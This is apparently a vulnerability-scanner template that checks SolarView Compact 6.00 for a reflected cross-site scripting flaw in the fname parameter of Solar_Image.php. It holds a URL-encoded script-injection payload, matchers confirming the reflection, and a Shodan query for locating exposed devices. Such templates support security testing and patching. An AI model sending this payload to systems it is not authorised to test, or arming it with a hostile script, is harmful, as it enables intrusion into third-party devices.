id: solarview-compact-xss

info:
  name: SolarView Compact 6.00 - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    SolarView Compact 6.00 contains a cross-site scripting vulnerability via fname at /Solar_Image.php.
  reference:
    - https://www.exploit-db.com/exploits/50968
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"SolarView Compact"
  tags: xss,solarview,edb

http:
  - method: GET
    path:
      - '{{BaseURL}}/Solar_Image.php?mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="test"><script>alert(document.domain)</script>">'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502201d1c5c6244021dbe66dd47d9f3091fd34d7989e27145289e6d171cd2eccf699d022100b8bd83ba2b17510c4ad1ec1692e195eaf30fefb63692e3a89b582de0277af0ed:922c64590222798bb761d5b6d8e72950
